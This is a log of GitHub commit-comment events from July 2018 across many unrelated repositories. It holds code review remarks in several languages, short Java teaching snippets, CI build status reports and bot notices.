{"id":"7993440083","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"kristalls/thinkneticaRoR"},"payload":{"comment":{"id":29775200,"position":1,"line":11,"path":"lesson1/triangle.rb","commit_id":"1c58011bc6f5c532180f297b53e56a36b7b2b1dc","created_at":"2018-07-20T07:41:10Z","updated_at":"2018-07-20T07:41:10Z","author_association":"NONE","body":"там где используется `to_i` (или `to_f`) вызов `chomp` (`strip`) не нужен, т.к. `to_i` (или `to_f`) \"все сделает сам\"\r\n"}},"created_at":"2018-07-20T07:41:10Z"}
{"id":"7993441019","type":"CommitCommentEvent","actor":{"login":"MJZ1977"},"repo":{"name":"MJZ1977/Stockfish"},"payload":{"comment":{"id":29775202,"position":null,"line":null,"path":null,"commit_id":"9f673e3084e78f8b0967b98f7f88c502c1c859cf","created_at":"2018-07-20T07:41:23Z","updated_at":"2018-07-20T07:41:23Z","author_association":"OWNER","body":"That's right. Thank you !!"}},"created_at":"2018-07-20T07:41:23Z"}
{"id":"7993441937","type":"CommitCommentEvent","actor":{"login":"philsupertramp"},"repo":{"name":"JDAPweb/WA-project"},"payload":{"comment":{"id":29775205,"position":7,"line":7,"path":"logout.php","commit_id":"51dad2a219ca5dc96f8579b9a713fd95cdc2b4e3","created_at":"2018-07-20T07:41:37Z","updated_at":"2018-07-20T07:41:37Z","author_association":"COLLABORATOR","body":"Vorsicht! :smile: muss zu `header('Location: index.php');` geändert werden!"}},"created_at":"2018-07-20T07:41:37Z"}
{"id":"7993442472","type":"CommitCommentEvent","actor":{"login":"JC1738"},"repo":{"name":"opentable/sous"},"payload":{"comment":{"id":29775207,"position":null,"line":null,"path":null,"commit_id":"8375c97aac0f98c37a66333b71ce1b4e5fbec9bc","created_at":"2018-07-20T07:41:45Z","updated_at":"2018-07-20T07:41:45Z","author_association":"MEMBER","body":"TeamCity Sous Support :: Sous Tests :: Smoke Tests Nightly (not exlude fail) [Build 46](https://teamcity.otenv.com/viewLog.html?buildId=8974498&buildTypeId=SousSupport_SousTests_SmokeTestsNightlyNotExludeFail) outcome was **UNKNOWN**\nSummary: Canceled (Step 2/2) Build time: 00:13:00"}},"created_at":"2018-07-20T07:41:45Z"}
{"id":"7993442739","type":"CommitCommentEvent","actor":{"login":"gmltA"},"repo":{"name":"MikhailSkirukha/bsuirfind"},"payload":{"comment":{"id":29775208,"position":6,"line":96,"path":"BsuirFind.Foundation/Services/TeamService.cs","commit_id":"9cbc9bf14d6cf4980dd4e51b8ab11ccb6ad0aad3","created_at":"2018-07-20T07:41:50Z","updated_at":"2018-07-20T07:41:50Z","author_association":"COLLABORATOR","body":"I guess we don't need 'captain check' here as soon as other members can still get their teams via this request."}},"created_at":"2018-07-20T07:41:50Z"}
{"id":"7993445381","type":"CommitCommentEvent","actor":{"login":"ypafeuer"},"repo":{"name":"ypafeuer/java"},"payload":{"comment":{"id":29775225,"position":null,"line":null,"path":null,"commit_id":"883aa6649082fefa0527be010899758914be001d","created_at":"2018-07-20T07:42:29Z","updated_at":"2018-07-20T07:42:29Z","author_association":"OWNER","body":"```java\r\npackage javaapplication7;\r\n\r\nimport java.io.IOException;\r\n\r\npublic class JavaApplication7{\r\n    public static void main(String[] args){\r\n            try{\r\n                dosometing() ;\r\n            }\r\n            catch(Exception e){\r\n                System.out.println(\"\"+e);\r\n            }\r\n            \r\n        }\r\n\r\n    static void dosometing() throws IOException {\r\n                if(Math.random()>0.5) throw new IOException();\r\n                    throw new RuntimeException();\r\n    }\r\n    \r\n}\r\n```"}},"created_at":"2018-07-20T07:42:29Z"}
{"id":"7993456824","type":"CommitCommentEvent","actor":{"login":"ypafeuer"},"repo":{"name":"ypafeuer/java"},"payload":{"comment":{"id":29775255,"position":null,"line":null,"path":null,"commit_id":"883aa6649082fefa0527be010899758914be001d","created_at":"2018-07-20T07:45:18Z","updated_at":"2018-07-20T07:45:18Z","author_association":"OWNER","body":"```java\r\npackage javaapplication7;\r\n\r\npublic class JavaApplication7{\r\n    public static void main(String[] args){\r\n        new JavaApplication7(\"hello\").print();\r\n    }\r\n    String str =\"def\";\r\n    JavaApplication7(String s){str=s;}\r\n    void print(){\r\n        System.out.println(\"\"+str);\r\n    }\r\n\r\n\r\n    \r\n}\r\n```"}},"created_at":"2018-07-20T07:45:18Z"}
{"id":"7993462560","type":"CommitCommentEvent","actor":{"login":"ollie-hpcnt"},"repo":{"name":"BradLarson/GPUImage2"},"payload":{"comment":{"id":29775272,"position":null,"line":null,"path":null,"commit_id":"33db0e9435e75cc31cd684aaadd6098ed2297fb1","created_at":"2018-07-20T07:46:37Z","updated_at":"2018-07-20T07:46:37Z","author_association":"NONE","body":"Hello, Brad! \r\nAt line 157, should AVMediaTypeVideo be AVMediaType.video? "}},"created_at":"2018-07-20T07:46:37Z"}
{"id":"7993465704","type":"CommitCommentEvent","actor":{"login":"ypafeuer"},"repo":{"name":"ypafeuer/java"},"payload":{"comment":{"id":29775284,"position":null,"line":null,"path":null,"commit_id":"883aa6649082fefa0527be010899758914be001d","created_at":"2018-07-20T07:47:26Z","updated_at":"2018-07-20T07:47:26Z","author_association":"OWNER","body":"```java\r\npackage javaapplication7;\r\n\r\npublic class JavaApplication7{\r\n    public static void main(String[] args){\r\n        new JavaApplication7(\"hello\").print();\r\n    }\r\n    String str =\"def\";\r\n    JavaApplication7(String s){this.str=s;}//建構子\r\n    void print(){\r\n        System.out.println(\"\"+this.str);\r\n    }\r\n\r\n\r\n    \r\n}\r\n```"}},"created_at":"2018-07-20T07:47:26Z"}
{"id":"7993467571","type":"CommitCommentEvent","actor":{"login":"ViktoriyaRyazhska"},"repo":{"name":"ViktoriyaRyazhska/Lv-329.JavaCore"},"payload":{"comment":{"id":29775288,"position":11,"line":11,"path":"week_four/HW7ex3/Course_comparator.java","commit_id":"0d3d102c4f96de70e18962bce263ab3ed4544d1a","created_at":"2018-07-20T07:47:53Z","updated_at":"2018-07-20T07:47:53Z","author_association":"OWNER","body":"return s1.getCourse() -  s2.getCourse();"}},"created_at":"2018-07-20T07:47:53Z"}
{"id":"7993467711","type":"CommitCommentEvent","actor":{"login":"md2perpe"},"repo":{"name":"aliariff/vscode-auto-add-brackets"},"payload":{"comment":{"id":29775289,"position":88,"line":88,"path":"src/extension.ts","commit_id":"82973bd00d948711af4e3573ab2fefc91f9bead0","created_at":"2018-07-20T07:47:56Z","updated_at":"2018-07-20T07:47:56Z","author_association":"NONE","body":"What happens if you have a string like `\"abc \\\" def\"`? Will the `\\\"` make `isInsideString()` break?"}},"created_at":"2018-07-20T07:47:56Z"}
{"id":"7993471863","type":"CommitCommentEvent","actor":{"login":"aben20807"},"repo":{"name":"aben20807/re-bridgechat"},"payload":{"comment":{"id":29775296,"position":null,"line":null,"path":null,"commit_id":"b314aa815b0752845468de83db41f672e4eefbd9","created_at":"2018-07-20T07:48:54Z","updated_at":"2018-07-20T07:48:54Z","author_association":"OWNER","body":"#9 "}},"created_at":"2018-07-20T07:48:54Z"}
{"id":"7993473664","type":"CommitCommentEvent","actor":{"login":"gmltA"},"repo":{"name":"MikhailSkirukha/bsuirfind"},"payload":{"comment":{"id":29775302,"position":40,"line":192,"path":"BsuirFind.Foundation/Services/TrickService.cs","commit_id":"9cbc9bf14d6cf4980dd4e51b8ab11ccb6ad0aad3","created_at":"2018-07-20T07:49:20Z","updated_at":"2018-07-20T07:49:20Z","author_association":"COLLABORATOR","body":"Won't work as expected if there will be more than one target."}},"created_at":"2018-07-20T07:49:20Z"}
{"id":"7993473973","type":"CommitCommentEvent","actor":{"login":"ViktoriyaRyazhska"},"repo":{"name":"ViktoriyaRyazhska/Lv-329.JavaCore"},"payload":{"comment":{"id":29775304,"position":33,"line":33,"path":"week_four/HW7ex3/App.java","commit_id":"0d3d102c4f96de70e18962bce263ab3ed4544d1a","created_at":"2018-07-20T07:49:24Z","updated_at":"2018-07-20T07:49:24Z","author_association":"OWNER","body":"int course = 3;\r\nfor (Student st : list) {\r\n if (st.getCourse() == 3) \tSystem.out.println(st);\r\n}"}},"created_at":"2018-07-20T07:49:24Z"}
{"id":"7993477817","type":"CommitCommentEvent","actor":{"login":"dillonalynch"},"repo":{"name":"dillonalynch/dillonalynch.github.io"},"payload":{"comment":{"id":29775311,"position":null,"line":null,"path":null,"commit_id":"bb7030d86d99002b805741048f0102a22bfddf92","created_at":"2018-07-20T07:50:23Z","updated_at":"2018-07-20T07:50:23Z","author_association":"OWNER","body":"set minimal theme"}},"created_at":"2018-07-20T07:50:23Z"}
{"id":"7993478361","type":"CommitCommentEvent","actor":{"login":"ypafeuer"},"repo":{"name":"ypafeuer/java"},"payload":{"comment":{"id":29775312,"position":null,"line":null,"path":null,"commit_id":"883aa6649082fefa0527be010899758914be001d","created_at":"2018-07-20T07:50:32Z","updated_at":"2018-07-20T07:50:32Z","author_association":"OWNER","body":"```java\r\npackage javaapplication7;\r\n\r\npublic class JavaApplication7{\r\n    public static void main(String[] args){\r\n        System.out.println(\"\"+2+3+5);   //235\r\n        System.out.println(\"\"+2+1*5); //25\r\n    }\r\n\r\n\r\n    \r\n}\r\n```"}},"created_at":"2018-07-20T07:50:32Z"}
{"id":"7993480399","type":"CommitCommentEvent","actor":{"login":"LukeLER"},"repo":{"name":"easyw/kicadStepUpMod"},"payload":{"comment":{"id":29775318,"position":null,"line":null,"path":null,"commit_id":"80cf2370a5d3f763ad0f7f46dd37e8afc684b40c","created_at":"2018-07-20T07:51:02Z","updated_at":"2018-07-20T07:51:02Z","author_association":"NONE","body":"Thanks!! :+1: "}},"created_at":"2018-07-20T07:51:02Z"}
{"id":"7993481439","type":"CommitCommentEvent","actor":{"login":"rycee"},"repo":{"name":"rycee/home-manager"},"payload":{"comment":{"id":29775322,"position":116,"line":116,"path":"modules/misc/nixpkgs.nix","commit_id":"7417d8e86e9b1bfa47482f29604315f5ec2696bf","created_at":"2018-07-20T07:51:16Z","updated_at":"2018-07-20T07:51:16Z","author_association":"OWNER","body":"Yeah, the assert is a recent addition to Nixpkgs and we ran into it in Home Manager soon thereafter. @marsam fixed the issue in 092706eff85aa4501994016375693320ef9d2e7b so perhaps you are using an older checkout of HM?"}},"created_at":"2018-07-20T07:51:16Z"}
{"id":"7993482197","type":"CommitCommentEvent","actor":{"login":"gmltA"},"repo":{"name":"MikhailSkirukha/bsuirfind"},"payload":{"comment":{"id":29775326,"position":47,"line":199,"path":"BsuirFind.Foundation/Services/TrickService.cs","commit_id":"9cbc9bf14d6cf4980dd4e51b8ab11ccb6ad0aad3","created_at":"2018-07-20T07:51:25Z","updated_at":"2018-07-20T07:51:25Z","author_association":"COLLABORATOR","body":"For self-cast it's better to check argument (targetsId) for emptiness. Otherwise we'll cast trick on our team if we just can't find proper target in DB."}},"created_at":"2018-07-20T07:51:25Z"}
{"id":"7993485886","type":"CommitCommentEvent","actor":{"login":"AlexanderBabel"},"repo":{"name":"lukasroegner/homebridge-nello"},"payload":{"comment":{"id":29775337,"position":null,"line":null,"path":null,"commit_id":"a706f11ff4bd0208660a33becd321feb90aacdcd","created_at":"2018-07-20T07:52:15Z","updated_at":"2018-07-20T07:52:15Z","author_association":"COLLABORATOR","body":"I think you forgot a vertical bar."}},"created_at":"2018-07-20T07:52:15Z"}
{"id":"7993490574","type":"CommitCommentEvent","actor":{"login":"PedroErnst"},"repo":{"name":"salesagility/SuiteCRM"},"payload":{"comment":{"id":29775342,"position":null,"line":null,"path":null,"commit_id":"936018bc43b572b7a396a2286bdd4c24294aa4a4","created_at":"2018-07-20T07:53:23Z","updated_at":"2018-07-20T07:53:23Z","author_association":"MEMBER","body":"Thanks @pgorod"}},"created_at":"2018-07-20T07:53:23Z"}
{"id":"7993492933","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zerocracy/farm"},"payload":{"comment":{"id":29775346,"position":null,"line":null,"path":null,"commit_id":"6b256aec7feaa25e77e02813c34ec3b290d92fd0","created_at":"2018-07-20T07:53:59Z","updated_at":"2018-07-20T07:53:59Z","author_association":"COLLABORATOR","body":"Puzzle `939-6d7b5358` disappeared from [`src/main/java/com/zerocracy/radars/viber/VbBot.java`](https://github.com/zerocracy/farm/blob/master/src/main/java/com/zerocracy/radars/viber/VbBot.java), that's why I closed #1071. Please, remember that the puzzle was not necessarily removed in this particular commit. Maybe it happened earlier, but we discovered this fact only now."}},"created_at":"2018-07-20T07:53:59Z"}
{"id":"7993493926","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zerocracy/farm"},"payload":{"comment":{"id":29775347,"position":null,"line":null,"path":null,"commit_id":"6b256aec7feaa25e77e02813c34ec3b290d92fd0","created_at":"2018-07-20T07:54:14Z","updated_at":"2018-07-20T07:54:14Z","author_association":"COLLABORATOR","body":"Puzzle `1071-28281b2a` discovered in   [`src/main/groovy/com/zerocracy/stk/pm/comm/notify.groovy`](  https://github.com/zerocracy/farm/blob/master/src/main/groovy/com/zerocracy/stk/pm/comm/notify.groovy)   and submitted as #1449. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-20T07:54:14Z"}
{"id":"7993498994","type":"CommitCommentEvent","actor":{"login":"aben20807"},"repo":{"name":"aben20807/re-bridgechat"},"payload":{"comment":{"id":29775361,"position":null,"line":null,"path":null,"commit_id":"6bbcf028255c5ff9b16816820698870c36ed66e4","created_at":"2018-07-20T07:55:27Z","updated_at":"2018-07-20T07:55:27Z","author_association":"OWNER","body":"#8 "}},"created_at":"2018-07-20T07:55:27Z"}
{"id":"7993499976","type":"CommitCommentEvent","actor":{"login":"lukasroegner"},"repo":{"name":"lukasroegner/homebridge-nello"},"payload":{"comment":{"id":29775364,"position":null,"line":null,"path":null,"commit_id":"a706f11ff4bd0208660a33becd321feb90aacdcd","created_at":"2018-07-20T07:55:41Z","updated_at":"2018-07-20T07:55:41Z","author_association":"OWNER","body":"You are so right! That’s one of those issues that occur when you „just want to fix something“…“ah, you don’t need to test, just push it to master“…I’m sorry!\n\n> Am 20.07.2018 um 09:52 schrieb Alexander Babel <notifications@github.com>:\n> \n> I think you forgot a vertical bar.\n> \n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub <https://github.com/lukasroegner/homebridge-nello/commit/a706f11ff4bd0208660a33becd321feb90aacdcd#commitcomment-29775337>, or mute the thread <https://github.com/notifications/unsubscribe-auth/AP-4QKXYcKV43475RIR_I0Xvq6GRkdroks5uIYwwgaJpZM4VXmrQ>.\n> \n\n"}},"created_at":"2018-07-20T07:55:41Z"}
{"id":"7993505587","type":"CommitCommentEvent","actor":{"login":"JC1738"},"repo":{"name":"opentable/sous"},"payload":{"comment":{"id":29775371,"position":null,"line":null,"path":null,"commit_id":"8375c97aac0f98c37a66333b71ce1b4e5fbec9bc","created_at":"2018-07-20T07:57:01Z","updated_at":"2018-07-20T07:57:01Z","author_association":"MEMBER","body":"TeamCity Sous Support :: Sous Tests :: Smoke Tests Nightly (not exlude fail) [Build 47](https://teamcity.otenv.com/viewLog.html?buildId=8974517&buildTypeId=SousSupport_SousTests_SmokeTestsNightlyNotExludeFail) outcome was **SUCCESS**\nSummary: Tests passed: 50, ignored: 1 Build time: 00:15:15"}},"created_at":"2018-07-20T07:57:01Z"}
{"id":"7993506398","type":"CommitCommentEvent","actor":{"login":"sdroege"},"repo":{"name":"sdroege/gst-plugin-threadshare"},"payload":{"comment":{"id":29775373,"position":12,"line":52,"path":"src/socket.rs","commit_id":"3deb93a2a22f851d4d2f4576c87596cce6e7b936","created_at":"2018-07-20T07:57:13Z","updated_at":"2018-07-20T07:57:13Z","author_association":"OWNER","body":"I'd prefer to keep this without a default value"}},"created_at":"2018-07-20T07:57:13Z"}
{"id":"7993507027","type":"CommitCommentEvent","actor":{"login":"uchiumidmap"},"repo":{"name":"uchiumidmap/phptest"},"payload":{"comment":{"id":29775376,"position":null,"line":null,"path":null,"commit_id":"903563618ac99421d0b30fd1804b780f65caea14","created_at":"2018-07-20T07:57:22Z","updated_at":"2018-07-20T07:57:22Z","author_association":"OWNER","body":"commit"}},"created_at":"2018-07-20T07:57:22Z"}
{"id":"7993507574","type":"CommitCommentEvent","actor":{"login":"amio"},"repo":{"name":"amio/badgen"},"payload":{"comment":{"id":29775384,"position":null,"line":null,"path":null,"commit_id":"3a7a69e622b8664a9790c1c3b422a843be35cc89","created_at":"2018-07-20T07:57:29Z","updated_at":"2018-07-20T07:57:29Z","author_association":"OWNER","body":"Resolve #2 "}},"created_at":"2018-07-20T07:57:29Z"}
{"id":"7993509744","type":"CommitCommentEvent","actor":{"login":"sdroege"},"repo":{"name":"sdroege/gst-plugin-threadshare"},"payload":{"comment":{"id":29775388,"position":50,"line":211,"path":"src/socket.rs","commit_id":"3deb93a2a22f851d4d2f4576c87596cce6e7b936","created_at":"2018-07-20T07:57:59Z","updated_at":"2018-07-20T07:57:59Z","author_association":"OWNER","body":"This looks like the default implement that would be derived automatically. Is it not?"}},"created_at":"2018-07-20T07:57:59Z"}
{"id":"7993510005","type":"CommitCommentEvent","actor":{"login":"fozhao"},"repo":{"name":"aksonov/react-native-experimental-navigation"},"payload":{"comment":{"id":29775389,"position":null,"line":null,"path":null,"commit_id":"b8a9ea78b2df038d5088bcf88ce85a689cd191ca","created_at":"2018-07-20T07:58:03Z","updated_at":"2018-07-20T07:58:03Z","author_association":"NONE","body":"Hi @aksonov, could you update the dependency to this repo in the package.json of react-native-router-flux's v3 branch? It's still targeting to v0.29.1 instead of v0.29.2. Thanks in advance. "}},"created_at":"2018-07-20T07:58:03Z"}
{"id":"7993510591","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29775392,"position":null,"line":null,"path":null,"commit_id":"15183b39c052da06bfd6ecae742e832f520324a5","created_at":"2018-07-20T07:58:11Z","updated_at":"2018-07-20T07:58:11Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-20T07:58:11Z"}
{"id":"7993511470","type":"CommitCommentEvent","actor":{"login":"s-afanasiev"},"repo":{"name":"s-afanasiev/myRepository"},"payload":{"comment":{"id":29775393,"position":2,"line":2,"path":"src/net/proselyte/gitoverview/Person.java","commit_id":"24e0ea4cc7558aa872dc6ffaa041a053cfa80c3e","created_at":"2018-07-20T07:58:22Z","updated_at":"2018-07-20T07:58:22Z","author_association":"OWNER","body":"my comment 1"}},"created_at":"2018-07-20T07:58:22Z"}
{"id":"7993512310","type":"CommitCommentEvent","actor":{"login":"s-afanasiev"},"repo":{"name":"s-afanasiev/myRepository"},"payload":{"comment":{"id":29775395,"position":4,"line":4,"path":"src/net/proselyte/gitoverview/Person.java","commit_id":"24e0ea4cc7558aa872dc6ffaa041a053cfa80c3e","created_at":"2018-07-20T07:58:35Z","updated_at":"2018-07-20T07:58:35Z","author_association":"OWNER","body":"my comment 2\r\n"}},"created_at":"2018-07-20T07:58:35Z"}
{"id":"7993513469","type":"CommitCommentEvent","actor":{"login":"sdroege"},"repo":{"name":"sdroege/gst-plugin-threadshare"},"payload":{"comment":{"id":29775399,"position":79,"line":274,"path":"src/socket.rs","commit_id":"3deb93a2a22f851d4d2f4576c87596cce6e7b936","created_at":"2018-07-20T07:58:52Z","updated_at":"2018-07-20T07:58:52Z","author_association":"OWNER","body":"All the clock handling should go into the `DO_TIMESTAMP` branch. Once the TCP source is not live anymore there might not be a clock, and then the above will panic"}},"created_at":"2018-07-20T07:58:52Z"}
{"id":"7993519570","type":"CommitCommentEvent","actor":{"login":"oBetter"},"repo":{"name":"oBetter/tg-cli"},"payload":{"comment":{"id":29775409,"position":null,"line":null,"path":null,"commit_id":"ecc0c80433c62e87c508c145a24ab5e14ee4c921","created_at":"2018-07-20T08:00:17Z","updated_at":"2018-07-20T08:00:17Z","author_association":"OWNER","body":"两个\"允许用户的最大缩放值\" 而没有 \"允许用户的最小缩放值\""}},"created_at":"2018-07-20T08:00:17Z"}
{"id":"7993520524","type":"CommitCommentEvent","actor":{"login":"sdroege"},"repo":{"name":"sdroege/gst-plugin-threadshare"},"payload":{"comment":{"id":29775416,"position":8,"line":116,"path":"tests/tcpclientsrc.rs","commit_id":"8b1dd1a0b64591bbacacd83a43d909b74df059a1","created_at":"2018-07-20T08:00:30Z","updated_at":"2018-07-20T08:00:30Z","author_association":"OWNER","body":"This check should probably be outside. And here we go out of the loop once the source is EOS (it should be EOS once the connection is closed by the other side, does that not happen?)"}},"created_at":"2018-07-20T08:00:30Z"}
{"id":"7993534582","type":"CommitCommentEvent","actor":{"login":"xiaomeng1994"},"repo":{"name":"xiaomeng1994/mypython"},"payload":{"comment":{"id":29775459,"position":null,"line":null,"path":null,"commit_id":"f4b98ff2e342b8f26a782af78927915037f4bd55","created_at":"2018-07-20T08:03:48Z","updated_at":"2018-07-20T08:03:48Z","author_association":"OWNER","body":"脚本"}},"created_at":"2018-07-20T08:03:48Z"}
{"id":"7993557458","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"kristalls/thinkneticaRoR"},"payload":{"comment":{"id":29775509,"position":25,"line":22,"path":"lesson1/triangle.rb","commit_id":"1c58011bc6f5c532180f297b53e56a36b7b2b1dc","created_at":"2018-07-20T08:09:21Z","updated_at":"2018-07-20T08:09:21Z","author_association":"NONE","body":"этот блок получился очень запутанный\r\n\"иф элс\" с экзитом, и \"элсом\" внутри которого еще 2 переменных ищутся, плюс 2 тернарника... читать сложно\r\nпопробую разложить по полочкам:\r\n\r\n1. если у тебя выход в первой ветви из программы, то эту ветвь вообще можно не привязывать к остальному блоку, связанный блок условий нужен, чтобы выполнялась только одна ветвь и не было многочилсенных проверок... если у тебя по результатам первой проверки выход из программы, то ее лучше написать отдельным блоком, а уже все остальное дерево ветвления - отдельным (т.е. то что у тебя сейчас в \"элс\")\r\n2. то что сейчас в \"элс\" правильней расписать в виде блока \"иф-элсиф-элс\" проверок, линейно, без вложенных условий\r\n3. тернарники нужно использовать очень редко и осторожно, в большинстве случаес они затрудняют чтение\r\nодин из лучших (и чуть ли не единственный) вариантов удачного использования тернарнков выглядит вот так:\r\n```ruby\r\nvariable = condition ? value1 : value2\r\n```\r\nэтот вариант легко читается, он понятен и ожидаем в коде\r\nпочти все другие варианты рабочие, но их стараются не использовать"}},"created_at":"2018-07-20T08:09:21Z"}
{"id":"7993557848","type":"CommitCommentEvent","actor":{"login":"aben20807"},"repo":{"name":"aben20807/re-bridgechat"},"payload":{"comment":{"id":29775511,"position":null,"line":null,"path":null,"commit_id":"41efad79eef09cffa085f1c0c564dadcdaf9f7ec","created_at":"2018-07-20T08:09:27Z","updated_at":"2018-07-20T08:09:27Z","author_association":"OWNER","body":"#10 "}},"created_at":"2018-07-20T08:09:27Z"}
{"id":"7993565763","type":"CommitCommentEvent","actor":{"login":"DieHertz"},"repo":{"name":"ctzsnooze/betaflight"},"payload":{"comment":{"id":29775520,"position":35,"line":60,"path":"src/main/sensors/gyroanalyse.c","commit_id":"16882d7a063bbfb59a8c27ddec031730d02aa1e8","created_at":"2018-07-20T08:11:17Z","updated_at":"2018-07-20T08:11:17Z","author_association":"NONE","body":"Sounds more like `fftSampleCount`"}},"created_at":"2018-07-20T08:11:17Z"}
{"id":"7993568981","type":"CommitCommentEvent","actor":{"login":"MeridianOXC"},"repo":{"name":"SupSuper/OpenXcom"},"payload":{"comment":{"id":29775526,"position":23,"line":417,"path":"src/Engine/Language.cpp","commit_id":"bade7eea3d47bb747b95c9e1bc7599af5898e235","created_at":"2018-07-20T08:12:02Z","updated_at":"2018-07-20T08:12:02Z","author_association":"CONTRIBUTOR","body":"Maybe also just loadString(value) ?"}},"created_at":"2018-07-20T08:12:02Z"}
{"id":"7993572515","type":"CommitCommentEvent","actor":{"login":"theodelrieu"},"repo":{"name":"nlohmann/json"},"payload":{"comment":{"id":29775528,"position":9,"line":7640,"path":"include/nlohmann/json.hpp","commit_id":"04372a8c569b8788373d7d4a655b3f40aca454f9","created_at":"2018-07-20T08:12:51Z","updated_at":"2018-07-20T08:12:51Z","author_association":"CONTRIBUTOR","body":"Well, I forgot that function partial specialization is forbidden, nevermind!"}},"created_at":"2018-07-20T08:12:51Z"}
{"id":"7993578087","type":"CommitCommentEvent","actor":{"login":"hinrik"},"repo":{"name":"crystal-lang/crystal"},"payload":{"comment":{"id":29775544,"position":19,"line":19,"path":"src/static_array.cr","commit_id":"6ab9c603c9cc290dc0b84ba2de307afba29f7208","created_at":"2018-07-20T08:14:13Z","updated_at":"2018-07-20T08:14:13Z","author_association":"CONTRIBUTOR","body":"    # ints = unininitialized Int32[3]\r\n\r\nShould be `uninitialized`."}},"created_at":"2018-07-20T08:14:13Z"}
{"id":"7993578977","type":"CommitCommentEvent","actor":{"login":"kritik"},"repo":{"name":"shoperb/theme-editor"},"payload":{"comment":{"id":29775547,"position":null,"line":null,"path":null,"commit_id":"e1610f77023759a629447fb276a37bf573b95df8","created_at":"2018-07-20T08:14:26Z","updated_at":"2018-07-20T08:14:26Z","author_association":"NONE","body":"Better use https link. Git is not using ssl\n"}},"created_at":"2018-07-20T08:14:26Z"}
{"id":"7993579098","type":"CommitCommentEvent","actor":{"login":"Kyrixx"},"repo":{"name":"Essindraa/DTK-client"},"payload":{"comment":{"id":29775548,"position":11,"line":11,"path":"src/index.js","commit_id":"e3787d4b1fe160f1771df77874ff2d964473567a","created_at":"2018-07-20T08:14:28Z","updated_at":"2018-07-20T08:14:28Z","author_association":"NONE","body":"Ici, la syntaxe est un peu lourde, tu peux extraire `(window['__REDUX_DEVTOOLS_EXTENSION_COMPOSE__'] || compose)` dans une variable `composeEnhancers`. Ca permettra d'y voir un peu plus clair"}},"created_at":"2018-07-20T08:14:28Z"}
{"id":"7993581600","type":"CommitCommentEvent","actor":{"login":"Kyrixx"},"repo":{"name":"Essindraa/DTK-client"},"payload":{"comment":{"id":29775551,"position":18,"line":9,"path":"src/js/App.js","commit_id":"e3787d4b1fe160f1771df77874ff2d964473567a","created_at":"2018-07-20T08:15:04Z","updated_at":"2018-07-20T08:15:04Z","author_association":"NONE","body":"Je te conseille de garder la même syntaxe de partout et d'utiliser des classes de partout pour tes composants"}},"created_at":"2018-07-20T08:15:04Z"}
{"id":"7993582501","type":"CommitCommentEvent","actor":{"login":"DieHertz"},"repo":{"name":"ctzsnooze/betaflight"},"payload":{"comment":{"id":29775552,"position":94,"line":254,"path":"src/main/sensors/gyroanalyse.c","commit_id":"16882d7a063bbfb59a8c27ddec031730d02aa1e8","created_at":"2018-07-20T08:15:13Z","updated_at":"2018-07-20T08:15:13Z","author_association":"NONE","body":"Is there a possibility energy distributions rises so smoothly that you'll never end up getting `next >= 1.5 * prev`?"}},"created_at":"2018-07-20T08:15:13Z"}
{"id":"7993584357","type":"CommitCommentEvent","actor":{"login":"ypafeuer"},"repo":{"name":"ypafeuer/java"},"payload":{"comment":{"id":29775561,"position":null,"line":null,"path":null,"commit_id":"883aa6649082fefa0527be010899758914be001d","created_at":"2018-07-20T08:15:36Z","updated_at":"2018-07-20T08:15:36Z","author_association":"OWNER","body":"```java\r\npackage javaapplication7;\r\n\r\nclass x{\r\n    x(){}\r\n    protected void one(){}\r\n    //private void one(){}\r\n}\r\npublic class JavaApplication7 extends x{\r\n    JavaApplication7(){}\r\n    private void two(){one();}\r\n    public static void main(String[] args){\r\n        new JavaApplication7().two();\r\n    }//\r\n}\r\n\r\n```"}},"created_at":"2018-07-20T08:15:36Z"}
{"id":"7993585744","type":"CommitCommentEvent","actor":{"login":"matklad"},"repo":{"name":"matklad/rls"},"payload":{"comment":{"id":29775564,"position":21,"line":1803,"path":"src/test/mod.rs","commit_id":"746b0f4563eb42783d5c679f27951ca2f79b1080","created_at":"2018-07-20T08:15:54Z","updated_at":"2018-07-20T08:15:54Z","author_association":"OWNER","body":"This is the place where SIGILL happens. `expect_messages` calls `wait_for_all` internally. "}},"created_at":"2018-07-20T08:15:54Z"}
{"id":"7993585938","type":"CommitCommentEvent","actor":{"login":"Kyrixx"},"repo":{"name":"Essindraa/DTK-client"},"payload":{"comment":{"id":29775566,"position":1,"line":1,"path":"src/js/action/actionAddMessage.js","commit_id":"e3787d4b1fe160f1771df77874ff2d964473567a","created_at":"2018-07-20T08:15:57Z","updated_at":"2018-07-20T08:15:57Z","author_association":"NONE","body":"Des types, tu peux en avoir beaucoup, plus d'une centaine des fois, je te conseille de les mettre dans un fichier `src/js/action/types.js`pour ne pas a avoir a les chercher quand t'en auras besoin"}},"created_at":"2018-07-20T08:15:57Z"}
{"id":"7993589483","type":"CommitCommentEvent","actor":{"login":"bornin97"},"repo":{"name":"bornin97/RTClib"},"payload":{"comment":{"id":29775584,"position":null,"line":null,"path":null,"commit_id":"ed41818e4b45d3b16153fccf20ef6875235b0134","created_at":"2018-07-20T08:16:42Z","updated_at":"2018-07-20T08:16:42Z","author_association":"OWNER","body":"The function 'dayOfTheWeek' is written as 'dayOfWeek'."}},"created_at":"2018-07-20T08:16:42Z"}
